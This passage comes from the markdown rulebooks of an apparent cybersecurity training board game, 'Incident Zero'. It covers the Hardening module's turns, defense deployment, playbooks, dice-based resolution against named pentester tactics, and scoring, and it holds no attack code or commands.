  6. Orange (Delivery): CLOUD-04
  7. Include cloud provider logos if desired (AWS, Azure, GCP)
  8. Cut along dotted lines
  9. Create a "Cloud Architecture Reference Card" comparing services

Integration with Core Cloud Cards

Cloud Core Deck (from core-deck/architecture-cards.md)

Recommended Combinations


Possible Future Expansions

Additional Cloud Variant Cards: - CLOUD-05: Machine Learning Platform (ML training/inference) - CLOUD-06: Event Streaming (Kafka, pub/sub architectures) - CLOUD-07: Search & Analytics (Elasticsearch, BigQuery) - CLOUD-08: API Gateway (API management and rate limiting) - CLOUD-09: Message Queue (async processing, event-driven) - CLOUD-10: Infrastructure as Code Platform (automated deployment)


Network Building Module: Cloud Variants (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.1 - Balanced & Refined Edition

docs/rules/module-hardening.md

Hardening Module: Complete Rules

Version: 2.2 - Playtest Edition Module Duration: 20-45 minutes (standalone or after Incident Response) Prerequisites: None (can play standalone) or completion of Incident Response module Learning Focus: Defense-in-depth, security architecture, proactive hardening, layered controls


Module Overview

The Hardening Module teaches players how to build multi-layered security controls that work together to protect critical systems. Players transition from reactive incident response to proactive security design.

This module can be: - Standalone: Play alone with generated threat context - Continuation: Follow a successful Incident Response (players harden against discovered threats) - Paired: Combined with other modules for complete security lifecycle training


Core Mechanics: What's Different from Incident Response

Aspect Incident Response Hardening
Focus Detect hidden threats Build defenses against known threats
Time Pressure High (variable turn limit, 100 budget) Lower (7 turns, carries budget forward)
Actions Investigate, Deploy, Emergency Response Deploy, Upgrade, Playbook, Test
Rolls Needed Investigation & Defense deployments Test & Drill and Pentester defense rolls
Scoring Detection efficiency Defense layering & breadth
Threats Hidden chain Known vectors, Pentester tactics

Setup

Step 1: Determine Your Context

Option A: Standalone Play (Fresh Start)

Generate threat context from scratch (v2.2 — one standard procedure): - Roll 1d6 for each of the six threat vectors (SOCIAL_ENGINEERING, WEB_EXPLOIT, CREDENTIAL_ABUSE, MALWARE, NETWORK, DATA_EXFIL): - 1-2: No notable threat on this vector - 3-4: Intermediate threat on this vector - 5-6: Advanced threat on this vector - Or use Threat Orchestrator's chosen scenario - Budget: 150 (full planning allocation)

Option B: Continuation from Incident Response

Use the attack chain that was just discovered: - All revealed threat cards now represent known attack vectors - Each vector gets a defense priority - Budget carries over (minimum 20, maximum 150) - Example: If IR revealed Phishing, Lateral Movement, and Data Exfil, you harden against those specific vectors

Option C: Hypothetical Scenario

Threat Orchestrator describes a realistic scenario:

"Imagine your team successfully detected an attack chain: 1. Phishing campaign (SOCIAL ENGINEERING vector) 2. Lateral movement via SMB (NETWORK vector) 3. Data exfiltration (DATA EXFIL vector)

You have time to harden your network. Here are the threat vectors you need to defend against..."

Step 2: Initialize Trackers

Step 3: Prepare Card Decks

Step 4: Deal Starting Hand

Each Blue Team receives 5 Defense Cards (drawn randomly, face down in hand)

Step 5: Read Opening Narrative

Threat Orchestrator provides context for the hardening scenario:

"Your detection team successfully identified an attack chain. Now you have time and resources to harden your defenses to prevent similar attacks in the future. Here's what you're defending against and what assets are at risk..."


Gameplay: 7 Turns

The Hardening module runs 7 turns at every difficulty level (v2.2 — difficulty scales through the number of Pentester Tactics, not the turn count). One action per turn.

Turn Structure

START OF TURN - Announce turn number: "Hardening Turn 3..." - Announce remaining Budget - Declare any Pentester Challenge scheduled for this turn

PLANNING PHASE (2-3 minutes) - Team discusses hardening strategy - Decides which action to take this turn - Prepares for any mid-turn Pentester Challenge

ACTION PHASE - Execute chosen action (see below) - Resolve rolls if applicable - Update trackers

END OF TURN - Advance turn counter - Draw 1 new Defense Card - Check if Pentester Challenge occurs (typically turn 3-4)


Four Hardening Actions

Action 1: Deploy a New Defense 🛡️

Cost: 10/15/25 Budget (based on card tier) Roll Required: None—automatic success

How it works: 1. Choose a Defense Card from your hand 2. Announce which Asset or threat vector it protects 3. Place card on the table (face up) 4. Optional: Explain the deployment strategy (enhances learning but not required)

Effect: - Defense is immediately active and deployed - Counts toward Security Score (5 points per defense) - Cannot be undone (represents permanent security improvement) - Stays on board for remainder of module and beyond (if continuing)

Quick-Win Rule (v2.2): You may deploy up to 2 BASIC-tier defenses as a single action (pay 10 Budget each). This keeps foundational hygiene affordable within the 7-turn limit.

Examples: - Deploy Multi-Factor Authentication (ADVANCED - 15 Budget) on VPN access - Deploy EDR on all workstations (ADVANCED - 15 Budget) - Deploy Data Loss Prevention (DLP) on network gateways (ADVANCED - 15 Budget) - Deploy Email Authentication (BASIC - 10 Budget) and User Security Training (BASIC - 10 Budget) together as one action (v2.2 Quick-Win)

Strategic Notes: - BASIC defenses (10 Budget) are cheaper but carry smaller printed bonuses against Pentester Tactics - ADVANCED defenses (15 Budget) provide good balance of cost/effectiveness - ELITE defenses (25 Budget) are expensive but carry the largest printed bonuses against Pentester Tactics


Action 2: Harden an Existing Defense ⬆️

Cost: 5 Budget per upgrade Roll Required: None

How it works: 1. Choose a Defense Card already deployed (earlier this game, or carried over from Incident Response) 2. Pay 5 Budget 3. Mark defense with +2 effectiveness bonus (track on paper) 4. Optional: Describe the hardening (e.g., "Tuning behavioral analytics in EDR")

Effect: - Defense effectiveness increases by +2 - Bonuses stack (EDR with three upgrades = +6 total) - Counts toward Security Score (2 points per upgrade) - Makes defense more resistant to Pentester Tactics

Examples of Hardening: - "Harden our MFA by requiring hardware tokens instead of SMS" → MFA now has +2 - "Enhance Network Segmentation with microsegmentation inside critical zones" → NS now has +2 - "Improve SIEM with threat intelligence integration" → SIEM now has +2

Strategic Value: - Fewer, well-hardened defenses can beat many basic ones - Upgrades compound: 3 upgrades on one defense = +6 bonus - Cost-effective way to improve security posture without full new deployments


Action 3: Prepare an Incident Response Playbook 📋

Cost: 10 Budget per playbook Roll Required: None Limit (v2.2): Maximum 2 playbooks per game

How it works: 1. Choose a specific threat vector you want to prepare for (SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL) 2. Write a 1-2 sentence playbook describing your response plan 3. Place playbook on the table with vector marked 4. When an attack using this vector occurs, you get one-time +3 bonus to your defense roll

Effect: - Provides one-time +3 bonus to defense roll when matching vector is attacked - Playbook is discarded after use (one-time only) - Counts toward Security Score (10 points per playbook) - Forces strategic thinking about which threats matter most

Example Playbooks: - SOCIAL ENGINEERING: "Credential Compromise Response - Forced MFA re-authentication and access token revocation across all systems" - MALWARE: "Ransomware Response - Immediate backup isolation, network segmentation, and process termination" - NETWORK: "Lateral Movement Detection - Real-time network behavior analysis and suspicious SMB activity alert protocol" - DATA EXFIL: "Data Theft Response - DLP block, endpoint containment, and forensic image capture" - WEB EXPLOIT: "Web Attack Response - Immediate application firewall rule deployment and vulnerable component isolation"

Strategic Considerations: - Playbooking is expensive (10 Budget) but provides large bonus (+3) - You can only use each playbook once, and only create two per game (v2.2) — plan carefully - Encourages predicting which threats are most dangerous - Reflects real-world incident response playbook development - Playbooks alone cannot win the game: victory requires at least 4 deployed defenses (v2.2)


Action 4: Test & Drill Defenses 🎯

Cost: 0 Budget (represents time investment) Roll Required: 11+ on d20

How it works: 1. Announce you're conducting a security drill 2. Choose one or more deployed defenses to test 3. For each defense, roll 1d20 4. Defenses with roll 11+ are successful; 10 or less fail

Effect: - Successful tests: Defense works properly (tracked as "tested") - Failed tests: Implementation issues found (no penalty, but noted) - Tests don't contribute to final score but provide confidence - Teaches the importance of validation and testing

Educational Value: - Reflects real-world practice of security testing - Validates that deployments actually work - Low-cost way to use budget on preparation vs. initial deployment


Mid-Game: Pentester Challenge

When Pentester Tactics Are Used

Typically after turn 3 or 4, once teams have deployed initial defenses.

Timing Options: - Per turn: One Pentester Tactic drawn each turn (turns 3-6) - Multiple attacks: 2-4 Pentester Tactics total (depends on difficulty) - Final challenge: All remaining Tactics drawn at end of turn 6

Pentester Tactic Cards (PT-01 to PT-08)

(v2.2) The Hardening module uses the standard Pentester Tactic deck, PT-01 to PT-08, defined in cards/hardening/core-deck/pentester-tactic-cards.md. Each card is a realistic red-team technique with a printed DC (difficulty class) and a list of printed defense bonuses for specific Defense Cards.

Card Tactic Target Vectors Difficulty Primary Defense
PT-01 Social Engineering - Pretexting Attack SOCIAL_ENGINEERING, CREDENTIAL_ABUSE BASIC (DC 12) D-02 User Training
PT-02 Malware Evasion - Living-off-the-Land MALWARE, CREDENTIAL_ABUSE INTERMEDIATE (DC 13) D-08 EDR
PT-03 Credential Dumping - Mimikatz CREDENTIAL_ABUSE, MALWARE INTERMEDIATE (DC 13) D-16 Credential Guard
PT-04 Lateral Movement - Network Traversal NETWORK, CREDENTIAL_ABUSE INTERMEDIATE (DC 13) D-09 Network Segmentation
PT-05 Privilege Escalation - Unpatched Kernel Exploit MALWARE, WEB_EXPLOIT ADVANCED (DC 14) D-03 Patch Management
PT-06 Data Exfiltration - Unmonitored Channel DATA_EXFIL, NETWORK ADVANCED (DC 14) D-11 DLP
PT-07 Supply Chain Compromise - Trusted Update MALWARE, WEB_EXPLOIT ADVANCED (DC 14) D-08 EDR / D-13 Threat Hunting
PT-08 Insider Threat - Malicious Administrator CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK EXPERT (DC 15) D-22 SIEM / D-20 Zero Trust

For expansion play, 8 additional tactics (PT-09 to PT-16) are available in cards/hardening/expansion-deck/advanced-tactics.md.


Attack Resolution: One Canonical Formula (v2.2)

When a Pentester Tactic Card is drawn:

1. Threat Orchestrator Describes the Attack

Example (PT-01): "A pentester calls your IT helpdesk impersonating a VIP executive, demanding emergency access to critical systems..."

2. Blue Team Chooses ONE Deployed Defense to Resolve With

Example: "We resolve this with our User Security Training (D-02) — staff are trained to verify callers."

3. Roll the Defense Roll

Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3, one-time, matching vector)

Success if the total ≥ the tactic card's printed DC.

Notes: - Only ONE defense's printed bonus applies per roll. If your chosen defense isn't on the tactic's bonus list, its printed bonus is +0 (upgrades and playbooks still apply). - Multi-vector or multi-phase tactics (e.g., PT-09): resolve each vector/phase as a separate roll, one chosen defense per roll. - Playbooks are discarded after use.

4. Worked Example

Tactic: PT-01 Social Engineering - Pretexting (DC 12)
Chosen defense: D-02 User Security Training (printed bonus +2 vs PT-01)
D-02 has 1 hardening upgrade (+2)
SOCIAL ENGINEERING playbook available (+3)

Roll 1d20 = 7
Total = 7 + 2 (printed) + 2 (upgrade) + 3 (playbook) = 14
14 ≥ DC 12 → SUCCESS. Playbook is discarded.

5. Outcome

(v2.2: the old -10 Reputation penalty has been removed from Hardening — failed defenses simply score nothing and trigger the card's printed consequence. Reputation remains a Disaster Recovery mechanic.)


Scoring: Security Score Calculation

Final Security Score Formula (v2.2 — one formula, used in both rules and standalone guide)

Security Score = (Defenses Deployed × 5)
               + (Hardening Upgrades × 2)
               + (Playbooks Created × 10)      [max 2 playbooks]
               + (Pentester Tactics Defended × 5)
               + (Budget Remaining / Starting Budget) × 10

Example Scoring (7 turns, 150 starting budget)

Turn 1: Deploy D-01 Email Auth + D-02 User Training (2 BASIC as one action)  -20
Turn 2: Deploy D-04 Firewall Rules + D-19 Backup & DR (2 BASIC)              -20
Turn 3: Deploy D-08 EDR (ADVANCED)                                           -15
        → PT-02 strikes: defended ✓
Turn 4: Deploy D-09 Network Segmentation (ADVANCED)                          -15
Turn 5: Create MALWARE playbook                                              -10
        → PT-01 strikes: defended ✓
Turn 6: Harden D-08 EDR (+2)                                                  -5
Turn 7: Deploy D-11 DLP (ADVANCED)                                           -15
        → PT-06 strikes: defended ✓ (D-11's printed +4 bonus vs DC 14 carried the roll)

Budget spent: 100 → 50 remaining

Defenses Deployed:      7 × 5  = 35 points
Hardening Upgrades:     1 × 2  =  2 points
Playbooks Created:      1 × 10 = 10 points
Tactics Defended:       3 × 5  = 15 points
Budget Efficiency: (50/150) × 10 ≈ 3 points
─────────────────────────────────────
FINAL SECURITY SCORE:            65 points → Strong (Victory)

Security Score Tiers (v2.2 — rescaled for the 7-action economy)

Score Level Interpretation Real-World Equivalent
75+ Exceptional Enterprise-grade security posture Large financial institution
60-74 Strong Comprehensive defense-in-depth Mid-market company
45-59 Adequate Basic layered protection Startup/small business
30-44 Weak Minimal defenses, significant gaps Under-resourced organization
Below 30 Vulnerable Inadequate protection, likely to fail High-risk organization

Winning & Losing Hardening

Victory Condition ✓ (v2.2)

Blue Team Wins Hardening if ALL of: - Final Security Score ≥ 60 (strong, comprehensive defense-in-depth) - AND at least 4 defenses deployed (playbooks and upgrades alone cannot win) - AND majority of Pentester Tactics defended against (defenses actually work)

Interpretation: Team successfully built layered, effective defenses within constraints.

Defeat Condition ✗

Blue Team Loses Hardening if: - Final Security Score < 45 (inadequate overall protection) - OR Budget exhausted before completing hardening strategy - OR majority of Pentester Tactics succeeded (defenses aren't effective)

Interpretation: Defenses are insufficient against realistic threats.

Scores between 45 and 59 that meet the tactic/defense requirements count as a partial success — adequate protection with room to improve.


Difficulty Levels

All difficulty levels run 7 turns (v2.2); difficulty scales via Pentester Tactic count.

Beginner Hardening

Intermediate Hardening

Advanced Hardening

Expert: Continuation from Incident Response (Loss)


Tips for Threat Orchestrators

Balancing Defense Deployment

Too Easy: - Teams deploy 8+ defenses with large budget remaining - Almost all Pentester Tactics fail - No meaningful decisions required - Game feels trivial

Too Hard: - Teams can only afford 3-4 defenses with budget exhausted - Almost all Pentester Tactics succeed - Team feels overwhelmed - Frustration rather than learning

Just Right (within 7 actions and 150 Budget): - Teams deploy 5-7 defenses with some budget remaining (the Quick-Win rule for BASIC pairs makes this achievable) - 50-70% of Pentester Tactics fail (defenses work) - Teams debate priorities and trade-offs - Players learn through strategic choices

Adjustments: - Lower budget (100) for harder game - Higher budget (200) for easier game - Fewer/more Pentester Tactics - Provide feedback: "Your defenses are working well" or "Your SIEM isn't catching these"

Using Pentester Tactics Effectively

Timing: Draw first tactic after turn 3-4 (let teams deploy initial defenses)

Narrative: Always frame tactics as specific scenarios: - "Your red team just attempted a supply chain attack..." - "An advanced attacker is using living-off-the-land techniques..." - "A coordinated insider attack is beginning..."

Strategy: Escalate difficulty - Turns 1-2: No tactics (deployment phase) - Turn 3: First tactic (softer: PT-01, DC 12) - Turn 4: Second tactic (medium: PT-02 to PT-04, DC 13) - Turn 5+: Third/fourth tactics (harder: PT-05 to PT-08, DC 14-15)

Common Teaching Moments

Defense-in-Depth: When a chosen defense earns only a +0/+1 printed bonus, discuss why layers matter Cost-Benefit: Teams overspend on Elite defenses; discuss Advanced alternatives Upgrades: Teams ignore upgrades; show how +2 bonuses compound Playbooks: Teams underestimate playbooks; demonstrate their power (+3 bonus) — and note the 2-per-game cap


Extensions & Variations

Extended Hardening (60 minutes)

Compliance-Enhanced Hardening

Competitive Hardening Tournament

Defense Architecture Detailed Play


Educational Objectives

Learning Goal How Module Teaches It
Defense-in-depth concept Deploy multiple layers, see some fail while others succeed
Resource prioritization Limited budget forces choices between defenses
Trade-offs in security BASIC cheap but weak vs. ELITE expensive but strong
Proactive vs. reactive Hardening teaches prevention vs. IR's response focus
Layering effectiveness Pentester Tactics show how weak defenses alone fail
Incident playbooks Playbook mechanic teaches the value of preparation
Security architecture Thoughtful defense selection teaches how to think architecturally
Cost-benefit analysis Every budget point spent has consequences

Quick Reference: Actions & Costs

Action Cost Roll Effect Score
Deploy Defense 10/15/25 None Active immediately (up to 2 BASIC per action, v2.2) +5 each
Harden Upgrade 5 None +2 effectiveness +2
Create Playbook 10 None One-time +3 bonus (max 2 per game, v2.2) +10
Test & Drill 0 11+ Validates defense +0

Pentester defense roll (v2.2): d20 + printed bonus (one chosen defense) + upgrades (+2 each) + playbook (+3) ≥ tactic DC. Each tactic defended: +5 Score.


Continuing to Other Modules

After Winning Hardening: - Continue to Incident Response (test your defenses) - Continue to Audit & Compliance (verify your hardening) - Play again with new threat vectors

After Losing Hardening: - Replay with different strategy - Try higher budget variation - Study which Pentester Tactics caused most losses - Plan for those tactics in next iteration


v2.2 Playtest Edition Changes

Changes for playtesters to validate, and why they were made:

  1. Pentester Tactics unified to the PT-01–PT-08 deck. The 8 tactics previously embedded in this document (Bypass Basic Defenses, Zero-Day, etc.) are replaced by the printed card deck in cards/hardening/core-deck/pentester-tactic-cards.md. This removes duplicate, conflicting tactic definitions (including a "Persistence Expert" tactic that referenced a nonexistent PERSISTENCE vector).
  2. One canonical resolution formula. Defense roll = d20 + printed defense bonus for ONE chosen defense (per the tactic card) + hardening upgrades on that defense (+2 each) + relevant playbook (+3), vs. the tactic's printed DC. The old "+2 to +4 by tier", "roll 11+/13+", and multi-defense "synergy stacking" texts are removed. Validate: do DCs 12-15 feel fair with the printed bonuses?
  3. Fixed turn count: 7 turns, one action per turn, plus the Quick-Win rule (deploy up to 2 BASIC defenses as one action). Validate: can teams realistically field 5-7 defenses in 7 actions?
  4. Single scoring formula (shared with the standalone guide) including Pentester results and budget efficiency; tiers rescaled (win at 60+). Reputation removed from Hardening scoring — failed tactics simply score 0 and trigger their printed consequence.
  5. Anti-playbook-spam: playbooks capped at 2 per game, and victory requires ≥4 deployed defenses.

Designer note — why playbook spam can't win (v2.2 math): - Playbook-spam strategy: 2 playbooks (cap) = 20 pts; 0 defenses = 0 pts; with no deployed defenses every Pentester roll is d20 + 0 (+3 once per playbook) vs DC 12-15, so expect ~1 of 3 tactics defended = 5 pts; budget efficiency (130/150) × 10 ≈ 9 pts. Total ≈ 34 — below the 60 threshold, and it fails the ≥4-defenses gate regardless. Cannot win. - Balanced layered strategy: 7 defenses (35) + 1 upgrade (2) + 1 playbook (10) + 3 of 3 tactics defended (15) + budget efficiency (50/150 × 10 ≈ 3) = 65 → Victory. See the worked example above.


Need Help?


Hardening Module - Complete Rules Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/standalone-games/hardening.md

Hardening Module: Standalone Play Guide

Version: 2.2 - Playtest Edition Duration: 30-45 minutes Players: 1 Threat Orchestrator + 2-4 Blue Team members Best For: Defense architecture training, security design, proactive hardening practice


Module Overview

The Hardening Module teaches players how to build defense-in-depth—layered security controls that work together to protect critical systems. Players deploy defenses strategically, harden existing controls, and defend against pentester challenges.

This module focuses on proactive security rather than reactive incident response.


Setup (5 minutes)

1. Choose Difficulty Level

All difficulty levels run 7 turns, one action per turn (v2.2). Difficulty scales via Pentester Tactic count.

Difficulty Budget Turn Limit Pentester Tactics Best For
Beginner 150 7 turns 2 cards First-time, teaching defense concepts
Intermediate 150 7 turns 3 cards Standard play, balanced challenge
Advanced 150 7 turns 4 cards Experienced players, comprehensive test

2. Set Your Scenario Context

Option A: Hypothetical Threat (Solo) Threat Orchestrator describes a realistic threat scenario:

"Imagine your team successfully detected an attack last month. The attacker started with a phishing email, moved laterally through the network via SMB, and escalated privileges using a kernel exploit. Now you have time to harden your defenses. Here's the threat profile you need to defend against..."

Option B: Follow from Incident Response Module If continuing from Incident Response: - Use the attack chain that was just played - Players now design defenses against those specific threats - Discovered vectors guide defense selection

Option C: Generate Threat Vectors Randomly (v2.2 — one standard procedure) Roll 1d6 for each of the six threat vectors to determine which threats you must defend against (1-2 = no notable threat, 3-4 = intermediate threat, 5-6 = advanced threat): - Roll 1d6 for SOCIAL ENGINEERING threats - Roll 1d6 for WEB EXPLOIT threats - Roll 1d6 for CREDENTIAL ABUSE threats - Roll 1d6 for MALWARE threats - Roll 1d6 for NETWORK threats - Roll 1d6 for DATA EXFIL threats

3. Blue Team Setup

4. Prepare Pentester Tactic Cards


Gameplay Loop (25-35 minutes)

Round Structure

Each turn represents time allocated to hardening (15-30 minutes of planning work per turn).

TURN SEQUENCE:

1. START OF TURN - Read turn number aloud ("Hardening Turn 1...") - Remaining budget announced

2. BLUE TEAM'S TURN (2-3 minutes discussion) - Discuss which hardening action to take - Decide strategy (deploy new defense, upgrade existing, create playbook)

3. ACTION EXECUTION - Perform chosen action - No roll needed for deployment (see below for when rolls occur) - Update trackers

4. END OF TURN - Advance Turn Tracker by 1 - Draw 1 new Defense Card - Check if mid-game Pentester Challenge should occur

Four Available Actions

Action 1: Deploy a New Defense 🛡️

Cost: 10/15/25 Budget (by tier) Roll Required: None—automatic success

How it works: 1. Choose a Defense Card from your hand 2. Announce which Asset or threat vector it defends 3. Explain strategy (optional but encouraged): "Why are we deploying this defense?" 4. Card is placed on the table (face up)

Outcome: - Defense is immediately active - No roll needed - All deployed defenses contribute to final Security Score

Quick-Win Rule (v2.2): You may deploy up to 2 BASIC-tier defenses as a single action (pay 10 Budget each).

Note (v2.2): The core deck contains one copy of each defense (D-01 to D-24), so each defense can only be deployed once per game. If you want duplicate deployments (e.g., two MFA implementations on different systems), print a second copy of the deck and house-rule it.


Action 2: Harden an Existing Defense ⬆️

Cost: 5 Budget per upgrade Roll Required: None

How it works: 1. Choose a Defense Card already deployed (from this turn or previous) 2. Pay 5 Budget 3. Mark defense with +2 effectiveness bonus (track on paper next to the card) 4. Optionally explain: "We're improving this defense by..."

Examples of hardening: - "Hardening our EDR deployment by tuning behavioral analytics and adding threat intel integration" → EDR now has +2 bonus - "Hardening our MFA implementation by enabling hardware token requirements" → MFA now has +2 bonus - "Hardening Network Segmentation by adding microsegmentation within critical zones" → Network Seg now has +2 bonus

Strategic Value: - Each upgrade adds +2 to the defense's effectiveness - Upgrades can stack (e.g., MFA with +2, +2, +2 = +6 total) - Upgraded defenses are more likely to survive Pentester Tactics


Action 3: Create an Incident Response Playbook 📋

Cost: 10 Budget per playbook Roll Required: None Limit (v2.2): Maximum 2 playbooks per game

How it works: 1. Choose a specific threat vector you want to prepare for 2. Write a 1-2 sentence playbook describing your response: (e.g., "Ransomware Outbreak Response: Immediate backup isolation, network segmentation, and access revocation") 3. Place playbook card on the table 4. When a Pentester uses a matching vector later, you get +3 bonus to your defense roll

Example Playbooks: - "Credential Compromise Incident: Forced MFA re-authentication and access token revocation" - "Supply Chain Attack Detection: Monitor unusual DNS and C2 beaconing patterns" - "Insider Threat Response: Behavioral analytics review and privileged access audit" - "Ransomware Response: Immediate backup isolation and network segmentation"

Strategic Value: - Playbooks cost more (10 Budget) but provide larger bonus (+3) - Limited use (one-time per playbook, then discarded after use; max 2 per game) - Forces teams to predict which threats are most dangerous - Playbooks alone cannot win: victory requires at least 4 deployed defenses (v2.2)


Action 4: Test & Drill Defenses 🎯

Cost: 0 Budget (represents time, not money) Roll Required: 11+ on d20

How it works: 1. Announce you're conducting a drill/test of deployed defenses 2. Choose one or more deployed defenses to test 3. Roll 1d20 for each defense 4. Each defense with roll of 11+ succeeds; 10 or less fails

Outcome: - Success: Defense works properly; mark it as "tested" (contributes extra points at end) - Failure: Defense has implementation issues; no penalty, but doesn't count toward testing bonus

Strategic Value: - Free way to validate defenses - Successful tests add confidence (and points) but don't guarantee success against real attacks - Encourages thinking about deployment validation (realistic practice)


Mid-Game: Pentester Challenge

After turn 3 or 4, the Threat Orchestrator draws a Pentester Tactic Card (PT-01 to PT-08, see cards/hardening/core-deck/pentester-tactic-cards.md) and launches a simulated attack.

Pentester Attack Resolution (v2.2 — one canonical formula)

1. TO Describes the Attack Scenario Example (PT-02): "Your red team delivered a payload that uses only built-in Windows tools — living-off-the-land. Can your defenses detect it?"

2. Blue Team Chooses ONE Deployed Defense to Resolve With Team selects one deployed defense to defend against this attack

3. Roll the Defense Roll

Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3, one-time, matching vector)

Success if the total ≥ the tactic card's printed DC (DC 12-15 for PT-01 to PT-08).

If the chosen defense isn't on the tactic's bonus list, its printed bonus is +0 (upgrades and playbooks still apply). Multi-vector tactics: two separate rolls, one defense each.

4. Outcome - Success: Defense holds; count as a Pentester Tactic Defended (+5 Security Score) - Failure: Attack succeeds; apply the consequence printed on the tactic card; no score for this tactic

Optional: Play multiple pentester tactics (2-4 total) across turns 3-6.


Scoring & Final Security Posture

Security Score Calculation (v2.2 — same formula as the module rules)

Defenses Deployed:          Count × 5 points
Hardening Upgrades:         Count × 2 points
Playbooks Created:          Count × 10 points   [max 2 playbooks per game]
Pentester Tactics Defended: Count × 5 points
Budget Efficiency:          (Remaining Budget / Starting Budget) × 10 points

EXAMPLE (150 starting budget, 7 turns):
- 7 defenses deployed (two turns used the 2-BASIC Quick-Win):  35 points
- 1 hardening upgrade:                                          2 points
- 1 playbook created:                                          10 points
- 3 of 3 pentester tactics defended:                           15 points
- 50 budget remaining (spent 100): (50/150) × 10 ≈              3 points
────────────────────────────
TOTAL SECURITY SCORE:                                          65 points → Strong (Victory)

Scoring Tiers (v2.2 — rescaled for the 7-action economy)

Score Level Interpretation
75+ Exceptional Enterprise-grade security posture; sophisticated threat preparedness
60-74 Strong Mid-market ready; layered, comprehensive defenses
45-59 Adequate Startup-level protection; covers main attack vectors
30-44 Weak Minimal protection; significant gaps remain
Below 30 Vulnerable Inadequate defenses; likely to fail against sophisticated attacks

Winning & Losing

Victory Condition ✓ (v2.2)

Blue Team Wins Hardening if ALL of: - Final Security Score ≥ 60 (strong layered defenses) - AND at least 4 defenses deployed (playbooks and upgrades alone cannot win) - AND majority of Pentester Tactics were successfully defended against

Defeat Condition ✗

Blue Team Loses Hardening if: - Final Security Score < 45 (inadequate protection) - OR Budget exhausted before defenses were deployed - OR majority of Pentester Tactics succeeded despite defenses

Scores of 45-59 that meet the tactic/defense requirements count as a partial success.


Debrief & Reflection (5-10 minutes)

PART 1: DEFENSE STRATEGY (3 min) 1. "How did you prioritize which defenses to deploy first?" 2. "What layers of defense work best together?" 3. "Did the Pentester Tactics reveal gaps? Which ones?"

PART 2: RESOURCE MANAGEMENT (2 min) 1. "Did you run out of budget? Would more budget have helped?" 2. "Which defenses provided the best value (cost vs. effectiveness)?" 3. "Would you have allocated budget differently?"

PART 3: PENTESTER RESULTS (2-3 min) 1. "Which Pentester Tactic was most surprising?" 2. "Which defense was most valuable against attacks?" 3. "How would you harden further given unlimited budget?"

PART 4: REAL-WORLD APPLICATION (2 min) 1. "If you were hardening your actual organization, what would you deploy first?" 2. "Why is defense-in-depth difficult in practice?" 3. "What's the hardest part of maintaining layered security?"


Tips for Threat Orchestrators

Balancing Defense Deployment

Too Easy: - Teams deploy 8+ defenses with budget to spare - All Pentester Tactics fail - No difficult decisions required

Too Hard: - Teams can only afford 3-4 defenses - Most Pentester Tactics succeed - Team feels overwhelmed

Just Right: - Teams deploy 5-7 defenses with some budget left - 50-70% of Pentester Tactics fail - Teams debate defense priorities

Adjust by: - Starting budget (120, 150, or 180) - Number of Pentester Tactics (2, 3, or 4) - Defense card availability (more common defense draws)

Pentester Tactic Timing

Narrative framing: "Your red team has tested your defenses..."

Running as Competitive Tournament

If multiple teams are hardening simultaneously: - All teams get same starting threat vectors - All teams draw from same card deck (or equivalent decks) - Highest Security Score wins - Tiebreaker: Most Budget remaining


Sample Scenarios to Try

Scenario 1: "Post-Phishing Hardening" (Beginner)

Threat Vector: SOCIAL ENGINEERING Budget: 150 Pentester Tactics: 2

Setup: "Your team detected a phishing attack. Now harden against social engineering threats."

Suggested defenses: - D-01: Email Authentication Setup (BASIC) - D-02: User Security Training (BASIC) - D-07: Multi-Factor Authentication (ADVANCED) - D-20: Zero Trust Access Control (ELITE)


Scenario 2: "Ransomware Preparedness" (Intermediate)

Threat Vectors: MALWARE, DATA EXFIL, NETWORK Budget: 150 Pentester Tactics: 3

Setup: "A ransomware variant targeted your industry. Prepare your defenses."

Key defenses: - D-08: EDR (Endpoint Detection & Response) - D-11: Data Loss Prevention (DLP) - D-09: Network Segmentation - D-15: Deception Technology (Honeypots) - D-19: Backup & Disaster Recovery - D-23: IR Program & Runbooks


Scenario 3: "Enterprise Hardening" (Advanced)

Threat Vectors: All 6 (SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, DATA EXFIL) Budget: 150 Pentester Tactics: 4

Setup: "Your enterprise faces threats across all vectors. Build comprehensive defense-in-depth."

Challenge: Defend against all six vectors with limited budget


Extensions & Variations

Hardening Plus (Extended Play)

Duration: 45-60 minutes - Start with Budget: 200 (more resources) - Play 9 turns instead of 7 (more time) - 4-5 Pentester Tactics (more challenges) - Raise the playbook cap from 2 to 3

Defense-in-Depth Deep Dive

Focus on layering: - Each turn, discuss why defenses work together - Create explicit layer descriptions: "Layer 1 (Prevention), Layer 2 (Detection), Layer 3 (Response)" - Score based on how well defenses complement each other

Compliance Integration

Add compliance requirement: - Teams must defend against threat vectors while meeting compliance requirements (PCI-DSS, GDPR, HIPAA) - Some defenses satisfy both security and compliance - Creates strategic depth


Next Steps After This Module

If you won: - Continue to Incident Response Module (as follow-up) → Test your defenses against attacks - Continue to Audit & Compliance Module → Validate your security posture

If you lost: - Replay with higher budget - Try a less complex scenario - Play Incident Response to understand what defenses are actually needed

Standalone: Play again with different threat vectors and Pentester Tactics


Quick Reference: Action Costs & Effects

Action Cost Effect Roll
Deploy Defense 10/15/25 Defense active immediately (up to 2 BASIC per action, v2.2) None
Harden Upgrade 5 +2 effectiveness to defense None
Create Playbook 10 +3 bonus when used once (max 2 per game, v2.2) None
Test & Drill 0 Validate defenses 11+

Pentester defense roll (v2.2): d20 + printed bonus (one chosen defense) + upgrades (+2 each) + playbook (+3) ≥ tactic DC.

For the full list of v2.2 changes and the reasoning behind them, see the "v2.2 Playtest Edition Changes" section in Module: Hardening.


Need Help?


Hardening Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game

cards/hardening/core-deck/defense-cards.md

Hardening Module: Defense Cards (Shared with Incident Response)

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

These 24 Defense Cards are shared between the Incident Response and Hardening modules. In Hardening, teams deploy these same defenses to build defense-in-depth and test them against Pentester Tactics.


Defense Card Organization

Tier System

